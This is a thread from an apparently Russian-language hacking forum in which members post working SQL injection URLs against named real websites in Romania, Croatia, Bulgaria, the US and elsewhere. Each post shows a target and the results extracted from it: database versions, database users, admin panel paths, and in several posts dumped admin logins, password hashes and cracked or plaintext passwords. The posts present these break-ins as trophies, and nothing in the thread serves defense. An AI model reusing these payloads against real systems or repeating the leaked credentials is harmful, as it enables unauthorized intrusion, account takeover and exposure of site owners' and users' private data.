SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    commencementflowers.com - PR3
    Code:
    http://www.commencementflowers.com/flowers_catalog/index.php?id=fuck%27+UNION+SELECT+concat_ws(0x3a,version(),user(),database())/*
    Version: 4.0.24-standard-log
    User: [email protected]
    DB name: convflow

    Админка:
    Code:
    http://www.commencementflowers.com/flowers_catalog/admin/
    Но к сожалению или к счастью basic авторизация =)
     
  2. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.birdsinbulgaria.org/news.php?id=-1+union+select+1,concat_ ws(0x 3a,version(),data  base(),user()),3,4,5,6--
    Database Version: 5.0.51
    Database name: birdsinbulgaria
    User name:birdsinbulgaria@localhost

    Code:
    http://www.eotepic.org/news.php?id=-1+union+select+1,2,3,concat_ ws(0x3a,vers ion(),database(),user ()),5 ,6,7,8,9,10,11,12,13,14,15,16,17,18--
    Database Version: 5.0.67
    Database name: eot_pacibirdsinbulgaria
    User name: [email protected]
     
    #7642 f1ng3r, 8 Feb 2009
    Last edited: 8 Feb 2009
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.ecazari.ro/cazare/index.php?pid=-1531+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2--%20&user=det


    Database Version: 4.1.22-standard-log
    Database name: rent4all_cazari
    User name: rent4all_cazari@localhost



    http://www.ecazari.ro/cazare/index.php?pid=-1531+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,email,id,name,password,user),0x71),0x71)+FROM+admin+LIMIT+0,1-- &user=det

    ::1::e7f7c6d0dd34536e5ad587c201ba7aef:admin

    pass cracked by OMG xteog300
     
    1 person likes this.
  4. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    Code:
    http://www.thrashermagazine.com/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--%20%20
    Code:
    http://www.slapmagazine.com/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),  email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--
     
    5 people like this.
  5. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    http://www.leaguexbox.fr - PR: 4

    Code:
    http://www.leaguexbox.fr/main_pages/news.php?id=-1+union+select+1,2,3,concat_ ws(0x3a,version(),datab ase(),user()) ,5,6,7,8, 9,10,11,12,13,14--
    Database Version : 5.0.44
    Database name : leaguexb
    User name : leaguexb@localhost
     
    #7645 f1ng3r, 8 Feb 2009
    Last edited: 8 Feb 2009
  6. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    http://www.bellarosa.by/guest.php?PagID=-999999+union+select+1,user(),version(),database(),concat_ws(0x3a,LOGIN,PASS)+from+br_users/*
     
    1 person likes this.
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.erachicco.ro/products.php?pid=36[SQL]&pager=9

    Version : 4.1.22-standard-log
    DataBase:erachico_erachicco
    User: erachico@localhost
     
  8. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    wol.bz - бесплатный хостинг=)
    юзер - [email protected]
    бд - constructor_new
    версия MySQL - 4.0.25-standard
     
  9. ПаВлУшКа

    ПаВлУшКа New Member

    Joined:
    7 Feb 2009
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    Code:
    http://www.cantus.hr/infonaslova.php?id=-36+union+select+1,2,3,4,5,concat_ws(iduser,0x3a,passwd),7+from+admin+limit+1,1
    http://www.cantus.hr/admin/ - админка
    Логин и пароль - vlasta
    Code:
    http://www.jk-meridijan.hr/article.php?id=-36+union+select+1,2,3,4,login,password,7,8,9,10,11,12+from+users+limit+1,1
     
    #7649 ПаВлУшКа, 8 Feb 2009
    Last edited by a moderator: 8 Feb 2009
    1 person likes this.
  10. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.paradigmmgmt.com/artist_detail.php?id=-1+union+select+1,2,3,concat_ ws(0 x3a,version(),database (),user()),5,6,7,8--
    Database Version : 5.0.67
    Database name : paradig3_db
    User name : paradig3_user@localhost
     
    #7650 f1ng3r, 8 Feb 2009
    Last edited: 9 Feb 2009
    2 people like this.
  11. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25

    Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)


    ccs2a

    scCommerce_computersworth



    Database Version: 5.1.30
    Database name: gamepile_14kofginafpd
    User name: gamepile_webuser@localhost


    Питорасики -)))


    Version:4.0.27-max-log
    User:[email protected]
    Database:mccann76



    Database Version:4.0.27-standard
    User name:maybs_mfadb@localhost
    Database name:maybs_claire


    ASP С мускулом!


    Database Version:4.0.24-nt-max
    User name:internetadmin@DEDI408
    Database name:standrew
     
    #7651 spherics, 9 Feb 2009
    Last edited: 9 Feb 2009
  12. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    PageRank 6

    Database Version: 5.1.11-beta
    Database name: rothbury
    User name: web.rbf@localhost


    Вывод на картиночке =)


    Version:4.1.25-Debian_mt1
    User:[email protected]
    Database:citric_es
     
    1 person likes this.
  13. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    PR4

    http://www.spiderproject.ro/ro/noutati.php?art=-39+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10

    Database Version: 5.0.67-community-log
    Database name: spiderpr_1
    User name: spiderpr_1@localhost



    З.Ы. особо дорог сей сайт тем , что его главный директор а именно http://www.spiderproject.ro/ro/echipa.php преподовал мне енту тему 1 год, екзамен сдал на ура, так как был единственным рускоязычным студентом в группе...а данная програма русская разработка :)
     
    #7653 Gorev, 9 Feb 2009
    Last edited: 9 Feb 2009
    2 people like this.
  14. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Database Version: 5.0.67-msl-icd1-log
    Database name: srosolutions_cms
    User name: [email protected]




    Fields username:password

    : admin : cantona1996
     
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://kormos.ro/index.php?lg=en&produse&pid=2[SQL]



    Version: 5.0.67-community
    DataBase: kormos_kormos
    User: kormos_kormos@localhost


    www.kormos.ro/admin
     
    2 people like this.
  16. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Version:4.0.27-standard
    User:freedoms_freedom@localhost
    Database:freedoms_freefeed


    Version:4.1.22-standard-log
    User:spoono_db@localhost
    Database:spoono_sections
     
    #7656 spherics, 9 Feb 2009
    Last edited: 9 Feb 2009
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.structural-project.ro/page.php?pid=-18+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),2,3,4,5,6/*


    Database Version: 4.1.11-log
    Database name: structural
    User name: [email protected]


    id,password,usr
    1:Razvan Ioan:3e21ab
    62fb17400301d9f0156b6c3031:razvanioan
    1:Niculina Tutu:3bcdff0b24ffe7eaeb6ed4966852c31f:nicktutu
    1:Admin:39b508932796a4c883b56bfc20e96054:StructProject

    www.structural-project.ro/admin
     
    1 person likes this.
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.digitalvision.ro/index.php?modp=sas&sid=-251301462+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6/*&prord=ASC



    Database Version: 5.0.48
    Database name: digitalvision_ro
    User name: dv_ro_miniuser@localhost



    http://www.digitalvision.ro/admin.php

    6898262ba962c9fe79fb3d5a057c8d75
     
  19. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://www.pdn.dkp.go.id/index.php?mod=modules/prd02.php&no=-31%20union%20select%201,2,3,4,concat_ws(0x3a,user,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%20from%20login--

    И вот содержимое таблицы Login

    NIP,user,unit,level,org,time_login,time_logout,status,psw,login_id,sessionid,userid,von,bis,status,site,UserID,UserPass,NamaUser,Level,Unker,no,user,password,level,no,user,password,level,no,user,password,level
     
    1 person likes this.
  20. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://matrimoniale.oltenia.ro/trimite-14354[SQL].html


    Version : 5.0.22-log
    Database: matrimoniale
    User : dassaev@localhost
     
    1 person likes this.
Thread Status:
Not open for further replies.